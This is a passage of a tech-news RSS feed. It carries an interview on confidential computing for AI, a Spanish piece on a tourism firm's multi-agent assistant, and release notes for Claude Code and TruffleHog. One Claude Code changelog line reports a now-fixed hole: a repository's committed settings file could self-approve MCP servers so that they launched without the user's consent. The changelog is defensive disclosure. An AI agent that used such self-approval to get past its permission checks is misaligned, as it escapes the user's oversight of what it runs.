<p>There are a variety of security concerns about artificial intelligence (AI), especially when it comes to the behavior of <a href="https://www.computerworld.com/article/3843138/agentic-ai-ongoing-coverage-of-its-impact-on-the-enterprise.html" data-type="link" data-id="https://www.computerworld.com/article/3843138/agentic-ai-ongoing-coverage-of-its-impact-on-the-enterprise.html">agentic AI</a>. But until recently, the concept of locking down the models to prevent tampering hasn’t gotten a lot of attention.</p>



<p>Now, a security technology called “confidential computing” has emerged that could help solve that problem: it protects AI models from hackers by restricting models to authorized users. (It also protects data wherever it is — in storage, when moving between systems, and when it is accessed.)</p>



<p>With many top cloud and hardware providers championing confidential computing for AI, <em>Computerworld</em> talked with Dion Harris, Nvidia’s senior director of high-performance computing and AI factory solutions, about what the technology does and how it works.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="722" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Dion Harris, Nvidia’s senior director of high-performance computing and AI factory solutions.</p>
</figcaption></figure><p class="imageCredit">Nvidia</p></div>



<p><strong>Why should organizations care about confidential computing now? </strong>“Seventy percent of data exists outside the cloud, in on-premise data centers and data lakes. To deliver AI on this data while maintaining security, you need confidential computing to unlock that use case for enterprise AI.”</p>



<p><strong>Why is confidential computing suddenly important in the AI age? </strong>“Enterprises want AI on sensitive data — customer records, medical information, financial data — without exposing it in cloud environments where they lose control.</p>



<p>“Traditional encryption protects data at rest and in transit, but not during computation. When you run an AI model, you must decrypt data. It sits in plain text in memory, accessible to administrators and cloud operators. Confidential computing creates a hardware-rooted trusted zone where data is decrypted only when computation needs it, then immediately re-encrypted.</p>



<p>“This lets enterprises get AI value without compromising security. Financial services, healthcare, government, and regulated industries are adopting it.”</p>



<p><strong>How is confidential computing changing with agentic AI? </strong>“We’ve gone from generative to agentic AI being deployed and used to solve real business problems. To deliver agentic capabilities with required privacy, security and performance in enterprise, confidential computing provides the unlock.</p>



<p>“We can spawn agents, access data, leverage tools and generate real useful work. With agentic AI, confidential computing helps in two ways: protecting the data and helping design implementation and workloads. It’s deployment, implementation, and use combined.”</p>



<p><strong>How does confidential computing work? “</strong>Encryption at rest protects stored data. Encryption in transit protects data moving over networks. Encryption in use is the problem — when you compute on data, you must decrypt it in memory. </p>



<p>“Confidential computing encrypts data in memory and between CPUs and GPUs. A dedicated element in the GPU decrypts information only when needed for computation, 100% inline, with minimal performance impact.”</p>



<p><strong>Can you walk through a real-world example? “</strong>Apple’s standard operating policy for years has been to keep private information on device to avoid having access to private data. However, to leverage advanced AI models, they no longer fit on the device. Apple instituted their Private Compute Cloud, and now they’re extending that to Google Cloud.</p>



<p>“Let me give a hypothetical and hopefully describe how it works. If you have a user who wants to upload a medical transcript from their doctor, their system creates a secure, attested environment. It sends a request to the server: validate yourself. That attestation says: ‘I am a Nvidia GPU. This environment is secure. It hasn’t been tampered with.’ Now, it’s okay for you to send your information over that secure line. Remote attestation allows the edge device to ensure it’s sending to a trusted environment.</p>



<p>“The medical data comes over encrypted and remains encrypted until it lands in the GPU memory. Specific compute engines in the processor decrypt that information only to use it. The LLM dissects and summarizes it. Then it re-encrypts and sends it back over the wire.</p>



<p>“They get the capabilities of data center AI mode — larger, more advanced, delivering more services. But they also get the security and privacy from Apple’s [Private Cloud Compute]  platform. It’s the best of both worlds: efficiencies and intelligence from data center AI with Apple’s PCC security.</p>



<p><strong>What prevented confidential computing adoption? “</strong>The main challenge in the past was significant performance impact. When you adopted confidential computing, you had to trade off performance for privacy. A 30% to 40% throughput reduction undermined the economic viability of the entire solution. If you sacrifice that much performance, it reduces the ability to get full utilization out of the hardware you’re deploying to deliver tokens or deliver a service in an economical fashion.”</p>



<p><strong>How was that solved? </strong>“With Blackwell and newer GPU architecture, you can deploy confidential computing without impact to performance. You get both privacy and performance, a win-win scenario.</p>



<p>“Performance now translates directly into economics. You get full utilization of the hardware, which matters for delivering tokens or services at scale. When we built Blackwell, we made confidential computing a first-class system feature to deliver not just the security, but also the performance the market requires.”</p>



<p><strong>Where is adoption accelerating? </strong>“Companies are thinking about the cloud. Model builders can’t expose APIs, enterprises customize for their business. Hybrid on-prem and cloud models — where builders deliver services behind enterprise walls — require zero trust. We’re no longer in fully owned infrastructure.</p>



<p>“By 2030, [billions of dollars] is expected in confidential computing use cases. It’s emerging as essential infrastructure for AI adoption across the industry. For organizations using cloud infrastructure, deploying AI on sensitive data, or operating under regulatory requirements, confidential computing is becoming essential.”</p>



<p><strong>What should organizations do? </strong>”The performance problem is solved. The technology is ready, ecosystems are built, partners enable it. If you want to deploy agentic AI on sensitive data, protect customer privacy, meet regulatory requirements, and maintain security across hybrid environments, you need confidential computing in your strategy.</p>



<p>“Most customers start with a developer license, validate performance and security, then migrate to a commercial license. Partners like Red Hat and Fortanix integrate these mechanisms within their platforms. Google Cloud offers it through their services.</p>



<p>“Start with a proof of concept. Validate it works. Plan deployment. Organizations gain competitive advantage securing AI on sensitive data.”</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Piñero impulsa una nueva etapa de su transformación digital con una IA integrada en el negocio]]></title>
<description><![CDATA[El turismo vive una profunda transformación impulsada por un nuevo perfil del cliente. Hoy los viajeros ya no buscan únicamente un destino o un hotel; demandan experiencias personalizadas, respuestas inmediatas y una relación fluida con las marcas antes, durante y después de cada viaje.



Para g...]]></description>
<link>https://tsecurity.de/de/3634946/it-nachrichten/piero-impulsa-una-nueva-etapa-de-su-transformacin-digital-con-una-ia-integrada-en-el-negocio/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634946/it-nachrichten/piero-impulsa-una-nueva-etapa-de-su-transformacin-digital-con-una-ia-integrada-en-el-negocio/</guid>
<pubDate>Tue, 30 Jun 2026 10:32:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>El turismo vive una <a href="https://www.cio.com/article/4029537/la-digitalizacion-del-sector-turismo-pasa-por-cuidar-el-dato.html">profunda transformación</a> impulsada por un nuevo perfil del cliente. Hoy los viajeros ya no buscan únicamente un destino o un hotel; demandan experiencias personalizadas, respuestas inmediatas y una relación fluida con las marcas antes, durante y después de cada viaje.</p>



<p>Para grupos como Piñero, compañía española con más de 50 años de experiencia en el sector del turismo, <em>real estate</em> y <em>hospitality</em>, responder a estas nuevas expectativas ha supuesto mucho más que incorporar tecnología. Ha implicado transformar la forma de operar, tomar decisiones y relacionarse con sus clientes. “La transformación digital está plenamente integrada en la estrategia corporativa. Hemos evolucionado desde iniciativas aisladas hacia un modelo transversal donde la tecnología actúa como habilitador clave del negocio, la eficiencia y la experiencia del cliente”, explica Antonio Muñoz, director de TI de Piñero.</p>



<h2 class="wp-block-heading">Ocho años acelerando la transformación</h2>



<p>Aunque la innovación tecnológica forma parte de la evolución natural de la compañía, el proceso de transformación digital se aceleró formalmente hace aproximadamente ocho años. Según explica Muñoz, el objetivo era doble: “Modernizar nuestra arquitectura tecnológica y dotar al grupo de capacidades digitales que impulsaran eficiencia, integración y una relación más directa y personalizada con el cliente”. Un proceso que, asegura, ha estado ligado al propio crecimiento de la organización. “Estos procesos de transformación forman parte de nuestro ADN como compañía y han venido acompañando al crecimiento empresarial de una manera muy cercana”.</p>



<p>Como ocurre en cualquier proceso de transformación, el camino no ha estado exento de desafíos. Entre los principales retos, el responsable de TI destaca “la gestión del cambio cultural, la convivencia entre sistemas <em>legacy</em>, la implementación de nuevas plataformas <em>cloud</em> y la necesidad de reforzar el talento digital y el gobierno del dato en un entorno multinacional”.</p>



<p>Aun así, la evolución tecnológica de Piñero durante los últimos años ha sido profunda. “Hemos evolucionado desde un entorno fragmentado y <em>on premise</em> hacia una arquitectura orientada a servicios, <em>cloud </em>y datos”, resume Muñoz.</p>



<p>Actualmente, la compañía opera sobre una arquitectura híbrida con un peso creciente de la nube, plataformas de integración y un <em>Data Platform</em> corporativo. Una transformación que ha venido acompañada de importantes cambios estructurales, entre ellos la implantación de plataformas de integración, la creación de una plataforma corporativa de datos y la estandarización de herramientas de productividad y colaboración.</p>



<p>Todo ello ha cambiado el papel que desempeña la tecnología dentro de la organización, pasando de ser “un soporte operativo a convertirse en una palanca estratégica, generadora de nuevas capacidades comerciales, analíticas y de servicio”, afirma el director de TI.</p>



<h2 class="wp-block-heading">Una estrategia común para negocios muy diferentes</h2>



<p>Uno de los retos más importantes de la compañía es articular una estrategia tecnológica coherente para negocios con necesidades distintas. Para lograrlo, el grupo ha construido una misma base tecnológica. “La estrategia se articula sobre unas redes troncales tecnológicas comunes —datos, integración, seguridad, identidad— sobre las que cada unidad despliega soluciones específicas. Este modelo garantiza coherencia, escalabilidad y reutilización de capacidades en todo el grupo”, explica Muñoz.</p>



<p>La digitalización no solo está transformando los procesos internos de la compañía, sino también la relación con los clientes. Al mismo tiempo, el dato se ha convertido en uno de sus principales activos estratégicos, apoyándose en herramientas de <em>business intelligence</em>, <em>machine learning</em> y analítica avanzada para convertir la información en decisiones y acciones concretas. “La ventaja competitiva de verdad sale de nuestros datos y de cómo los convertimos mediante algoritmos avanzados en decisiones y acciones que nos ayuden a ser más sostenibles en todos los ámbitos”, señala Muñoz.</p>



<figure class="wp-block-pullquote"><blockquote><p><em><strong>“Nuestro foco hoy es industrializar la IA”, apunta Antonio Muñoz, director de TI de Piñero</strong></em></p></blockquote></figure>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/ANTONIO-MUNOZ-IT-DIRECTOR-PINERO.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Antonio Muñoz, director de TI de Grupo Piñero" class="wp-image-4190950" width="1024" height="822" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Grupo Piñero</p></div>



<h2 class="wp-block-heading">La inteligencia artificial pasa de la experimentación a la operación</h2>



<p>Tras años construyendo los cimientos tecnológicos de la organización, la inteligencia artificial se ha convertido en una de las principales prioridades de Piñero, aunque, en los últimos años, el enfoque ha cambiado. “Nuestro foco hoy es industrializar la IA. Ya no estamos en una fase de probar cosas: estamos integrándola en procesos reales. La gran palanca es la IA generativa y, sobre todo, los flujos agénticos: sistemas que coordinan pasos, conectan datos y herramientas y optimizan procesos completos”.</p>



<p>La nueva herramienta tiene un objetivo muy definido: ayudar a los equipos comerciales y de <em>back office</em> a trabajar con toda la información relevante de propiedades y precios de forma unificada y contextualizada. “Esta herramienta permite a nuestros equipos contestar mejor, con más contexto, más coherencia y con una capacidad de decisión más precisa, independientemente del canal por el que llegue la petición de información”, explica Muñoz.</p>



<p>El sistema cuenta con un profundo conocimiento del catálogo de propiedades y del contexto de cada cliente, lo que, según el director de TI, permite “recomendar, comparar y comunicar mejor que nunca, con respuestas personalizadas y coherentes en todos nuestros canales”.</p>



<p>Desde el punto de vista tecnológico, la solución cuenta con “una combinación muy pragmática: IA generativa y una arquitectura multiagente, con varios agentes especializados que se coordinan para entender la consulta, buscar el contexto y construir una respuesta útil”, explica Muñoz.</p>



<p>De acuerdo con el director de TI, la diferencia respecto a otros asistentes radica en su integración con los sistemas internos de la organización: “Lo diferencial es que no es IA aislada: está integrada con las fuentes internas de la división para unificar información de propiedades, precios e históricos, y además se conecta a los canales donde trabaja el equipo —correo y WhatsApp— para generar respuestas personalizadas y comparativas/recomendaciones en tiempo real”.</p>



<p>Uno de los principales beneficios de este asistente es la reducción del tiempo dedicado a tareas repetitivas. “Esperamos liberar en torno a un 20-30% del tiempo del equipo en tareas repetitivas —buscar información, cruzar datos, preparar comparativas o redactar respuestas— para que puedan dedicarse más a tareas de valor, como el seguimiento y asesoramiento comercial”, comenta Muñoz.</p>



<p>Pero el objetivo no es sustituir el papel de las personas, sino potenciarlo. “Reduce gran parte del trabajo manual de buscar, cruzar y preparar información. Deja una propuesta prácticamente lista, y el paso final (criterio, matiz, decisión y cierre comercial) lo da la persona, que es donde está el verdadero valor”.</p>



<h2 class="wp-block-heading">Una tecnología llamada a extenderse</h2>



<p>El asistente de Real Estate &amp; Golf no será una iniciativa aislada, comenta Muñoz. “Este asistente no aparece de la nada: forma parte de una línea de trabajo que ya venimos desarrollando en el Grupo con asistentes y soluciones de IA en otras áreas”. La intención es extender estas capacidades al resto de negocios y seguir ampliando la arquitectura con nuevas fuentes de información, procesos y canales.</p>



<p>La hoja de ruta tecnológica de Piñero pasa por seguir escalando la inteligencia artificial, reforzar el gobierno del dato y acelerar la innovación aplicada al negocio. Para Muñoz, el gran reto será convertir a la organización en una compañía plenamente orientada al dato: “La mayor transformación vendrá de la capacidad de convertirnos en una organización data driven, donde la inteligencia artificial y la automatización impulsen decisiones, eficiencia y personalización a gran escala”.</p>



<p>Una visión que refleja cómo la tecnología ha dejado de ser un área de soporte para convertirse en uno de los principales motores de crecimiento y transformación del grupo.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw Releases iOS and Android Companion Node Apps That Connect a Phone to a Self-Hosted AI Agent Gateway]]></title>
<description><![CDATA[OpenClaw's iOS and Android apps are companion nodes, not standalone chatbots. Each phone pairs to a self-hosted Gateway over WebSocket. This adds device hardware — camera, location, voice, and Canvas — to a local-first AI agent. Here is the architecture, the capabilities, and the trade-offs for b...]]></description>
<link>https://tsecurity.de/de/3634251/ai-nachrichten/openclaw-releases-ios-and-android-companion-node-apps-that-connect-a-phone-to-a-self-hosted-ai-agent-gateway/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634251/ai-nachrichten/openclaw-releases-ios-and-android-companion-node-apps-that-connect-a-phone-to-a-self-hosted-ai-agent-gateway/</guid>
<pubDate>Tue, 30 Jun 2026 01:48:24 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw's iOS and Android apps are companion nodes, not standalone chatbots. Each phone pairs to a self-hosted Gateway over WebSocket. This adds device hardware — camera, location, voice, and Canvas — to a local-first AI agent. Here is the architecture, the capabilities, and the trade-offs for builders.</p>
<p>The post <a href="https://www.marktechpost.com/2026/06/29/openclaw-releases-ios-and-android-companion-node-apps-that-connect-a-phone-to-a-self-hosted-ai-agent-gateway/">OpenClaw Releases iOS and Android Companion Node Apps That Connect a Phone to a Self-Hosted AI Agent Gateway</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.196]]></title>
<description><![CDATA[What's changed

Added support for organization default models — admins set it in the org console; it shows as "Org default" (or "Role default") in /model when you haven't picked one yourself
Added readable default names for sessions at start, making them easier to identify and message
Added click...]]></description>
<link>https://tsecurity.de/de/3634245/downloads/v21196/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634245/downloads/v21196/</guid>
<pubDate>Tue, 30 Jun 2026 01:46:34 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added support for organization default models — admins set it in the org console; it shows as "Org default" (or "Role default") in <code>/model</code> when you haven't picked one yourself</li>
<li>Added readable default names for sessions at start, making them easier to identify and message</li>
<li>Added clickable file attachments in chat — Cmd/Ctrl-click reveals the file in Finder/Explorer</li>
<li>Security: <code>claude mcp list</code>/<code>get</code> no longer spawn <code>.mcp.json</code> servers that a repo self-approved via a committed <code>.claude/settings.json</code>; untrusted workspaces show <code>⏸ Pending approval</code></li>
<li>Fixed waking a background job permanently deleting its conversation and re-running the original prompt when the transcript probe misread a real transcript; the file is now set aside, never deleted</li>
<li>Fixed the rate-limit warning flickering off and rate-limit telemetry being over-counted when multiple parallel requests were in flight at the moment a usage limit was hit</li>
<li>Fixed duplicate recap lines after a background session's turn: a schema-rejected StructuredOutput attempt no longer renders alongside its retry</li>
<li>Fixed PowerShell <code>git diff</code>/<code>git grep</code>, <code>egrep</code>/<code>fgrep</code>, and quoted search patterns containing <code>|</code> being reported as failures when they exit 1, matching Bash behavior</li>
<li>Fixed multiple <code>claude agents</code> side panel issues: keyboard focus getting stuck when opening an agent, background jobs losing their subagent types on every open, and sessions showing incorrect status while actively running</li>
<li>Fixed <code>claude agents --dangerously-skip-permissions</code> silently falling back to auto mode instead of showing the bypass disclaimer and applying bypass mode to spawned agents</li>
<li>Fixed mid-turn crash recovery for Remote sessions — sessions interrupted by a server restart now auto-resume on the next worker</li>
<li>Fixed sessions moved with <code>/cd</code> reappearing in the old directory's resume list after a non-graceful exit when the old path contained special characters</li>
<li>Fixed <code>claude plugin validate</code> skipping local plugins whose source is "." and stopping after the first error class</li>
<li>Fixed Esc Esc at an idle prompt not opening the rewind menu (regression); use Ctrl+C or Ctrl+X Ctrl+K to stop background agents</li>
<li>Fixed MCP OAuth requesting the authorization server's full <code>scopes_supported</code> catalog when no scope is specified, causing <code>invalid_scope</code> failures on GitLab self-hosted and other enterprise IdPs</li>
<li>Fixed <code>/context</code> showing 0 tokens for all tool groups on Bedrock</li>
<li>Fixed <code>/deep-research</code> misreporting verifier failures as "all claims refuted" instead of <code>unverified</code></li>
<li>Fixed plugin dependency version pins not being honored when the marketplace was added as a local folder path backed by a git repo</li>
<li>Fixed <code>claude agents</code> session status: completed rows no longer flip between "Done" and "Needs your input", stalled agents are now labeled "Needs attention", and results that mention a PR show a clickable link</li>
<li>Fixed voice dictation swallowing spaces and spuriously starting a recording during very fast typing when voice mode is enabled</li>
<li>Improved background session reliability: long-running commands and workflows now survive the session's process being stopped, restarted, or updated — including on Windows, where background shells are handed off instead of being killed</li>
<li>Improved background agents: workers killed by a daemon restart are now automatically resumed from where they left off the next time the agents view opens</li>
<li>Improved <code>/code-review</code> workflow: merged five cleanup finders into one, cutting token usage by roughly 25%</li>
<li>Reduced per-frame rendering work in the terminal UI by skipping no-op subtree walks during streaming</li>
<li>The streaming idle watchdog is now on by default for all providers — it aborts and retries when a response stream produces no events for 5 minutes. Set <code>CLAUDE_ENABLE_STREAM_WATCHDOG=0</code> to disable.</li>
<li>Remote Control is now disabled when <code>ANTHROPIC_BASE_URL</code> points at a non-Anthropic host, matching the existing behavior under <code>CLAUDE_CODE_USE_BEDROCK</code>/<code>_VERTEX</code>/<code>_FOUNDRY</code></li>
<li>Changed opening the agents view from a foreground session to require a single <code>←</code> press instead of two, matching the behavior in background sessions</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v3.95.7]]></title>
<description><![CDATA[What's Changed

fix(sources/filesystem): order resume comparison by path component by @genisis0x in #5041
test(handlers): point APK test fixture at trufflehog-test-assets by @amanfcp in #5053
fixed regex typo that was causing conf uuid's to be surfaced as non-live atlassian secrets. by @jordanTun...]]></description>
<link>https://tsecurity.de/de/3633443/it-security-tools/v3957/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633443/it-security-tools/v3957/</guid>
<pubDate>Mon, 29 Jun 2026 18:04:24 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>fix(sources/filesystem): order resume comparison by path component by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/genisis0x/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/genisis0x">@genisis0x</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4672155125" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5041" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5041/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5041">#5041</a></li>
<li>test(handlers): point APK test fixture at trufflehog-test-assets by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amanfcp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amanfcp">@amanfcp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692945335" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5053" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5053/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5053">#5053</a></li>
<li>fixed regex typo that was causing conf uuid's to be surfaced as non-live atlassian secrets. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jordanTunstill/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jordanTunstill">@jordanTunstill</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4634203228" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5029" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5029/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5029">#5029</a></li>
<li>Fix GitHub App cross-org member enumeration using per-installation tokens by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dustin-decker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dustin-decker">@dustin-decker</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3999036169" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4774" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4774/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4774">#4774</a></li>
<li>fix: add git worktree support in PrepareRepo by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andoniaf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andoniaf">@andoniaf</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3846994423" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4690" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4690/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4690">#4690</a></li>
<li>[INS-406] Braintrust detector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MuneebUllahKhan222/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MuneebUllahKhan222">@MuneebUllahKhan222</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102936269" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4826" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4826/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4826">#4826</a></li>
<li>huggingface: add bucket scanning by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/julien-c/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/julien-c">@julien-c</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4590233106" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5017" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5017/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5017">#5017</a></li>
<li>Skip reverification results during deduplication by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mcastorina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mcastorina">@mcastorina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4731401575" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5069" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5069/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5069">#5069</a></li>
<li>chore(renovate): bump shared config to v1.0.3 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bryanbeverly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bryanbeverly">@bryanbeverly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4677094887" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5044" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5044/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5044">#5044</a></li>
<li>Add scan_all_installations option for multi-org GitHub App scanning by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dustin-decker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dustin-decker">@dustin-decker</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3999082633" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4775" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4775/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4775">#4775</a></li>
<li>Expose <code>SecretParts</code> in the JSON output by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bradlarsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bradlarsen">@bradlarsen</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736781866" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5073" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5073/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5073">#5073</a></li>
<li>[INS-497] Add Pganalyze Read Key Detector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MuneebUllahKhan222/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MuneebUllahKhan222">@MuneebUllahKhan222</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4548652797" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4993" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4993/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4993">#4993</a></li>
<li>[INS-197] Add redhatpyxis api key detector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MuneebUllahKhan222/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MuneebUllahKhan222">@MuneebUllahKhan222</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4548861283" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4995" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4995/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4995">#4995</a></li>
<li>[INS-407] Fixed AWS detector producing non deterministic output by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MuneebUllahKhan222/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MuneebUllahKhan222">@MuneebUllahKhan222</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4135380101" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4836" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4836/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4836">#4836</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/genisis0x/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/genisis0x">@genisis0x</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4672155125" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5041" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5041/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5041">#5041</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andoniaf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andoniaf">@andoniaf</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3846994423" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4690" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4690/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4690">#4690</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/julien-c/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/julien-c">@julien-c</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4590233106" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5017" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5017/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5017">#5017</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/trufflesecurity/trufflehog/compare/v3.95.6...v3.95.7"><tt>v3.95.6...v3.95.7</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sycophantic chatbots and the harms that build over many chats]]></title>
